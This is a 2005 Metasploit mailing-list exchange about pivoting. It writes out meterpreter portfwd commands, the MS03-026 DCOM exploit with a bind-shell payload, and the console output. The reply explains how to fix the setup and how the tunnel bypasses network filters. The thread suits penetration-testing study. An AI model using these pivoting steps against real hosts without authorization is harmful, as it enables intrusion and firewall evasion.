Metasploit mailing list archives
use of meterpreter (copy for the list )
From: thomas.werth at vahle.de (Thomas Werth)
Date: Thu, 14 Apr 2005 10:14:56 +0200
Lets see if i understand correctly : Exploiting another host and using meterpreter is first i do. Now the portfwd of meterpreter isn't running on victims host, instead it is running on "my" host, correct ? Now i setup portforwading using localhost and next desired target-ip. When now running attack based on proxy protforwading does it job and exploit should work , correct ? Now my question for better understanding : As portforwading is running on my host and target ip is different from "proxy Host" why do i need to exploit the proxy host as it seems to me this host isn't needed when using localhost and next target ip for "proxy attack " ? How is the "flow of packets" ? In case of logging on "next target host" which attacker ip will be logged ? thxs for your help mmiller at hick.org schrieb:
On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:1. Exploitet "proxy victim" with metasploit's meterpreter payload. 2. In meterpreter "shell" i'm adding some portfwd's like this : - portfwd -a -l 9500 -h 'nextTargetIP' -p 135 - portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P //-P is just another test in hope it will work this time ... 3. now i'm using msrpc exploit with win32_bind payload Setting Options to msf msrpc_dcom_ms03_026(win32_bind) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ----------- ------------------ required RHOST 'ProxyHost' The target address required RPORT 9500 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Windows NT SP6/2K/XP/2K3 ALL 4. now launching exploit msf msrpc_dcom_ms03_026(win32_bind) > exploit 5. that's where it hangs : [*] Starting Bind Handler. [*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444 6. Waited long enough, killed connetion with strg-C Caught interrupt, exit connection? [y/n] y [*] Exiting Bind Handler. What am i doing wrong, or isn't it possible to use portfwd so attacks can be redirected through a proxy ?The thing to note is that connections are proxied from your local machine through the meterpreter connection to the target that you are trying to reach. In the example you provided above, it appears that you are expecting the port forwards to be listening on the proxy host that you initially exploited. Instead, you should expect the port forward listeners to be listening on your local machine. All of the steps you performed were correct, except instead of using 'ProxyHost' you should use 127.0.0.1 for RHOST. I imagine the reason the bind handler got a connection is because you exploited the 'ProxyHost' with win32_bind (using port 4444). The reason connections are proxied starting from your local machine is because this allows you to transparently bypass any sort of inbound or outbound filters (since it tunnels through the already established meterpreter communication channel). Hope that helps!
-- MFG Thomas Werth Tel.: 02307 / 704 - 366 --------------------------------------------------------------------- Paul Vahle GmbH & Co. KG URL : http://www.vahle.de Westicker Strasse 52 D-59174 Kamen E-Mail : thomas.werth at vahle.de ---------------------------------------------------------------------
Current thread:
- use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)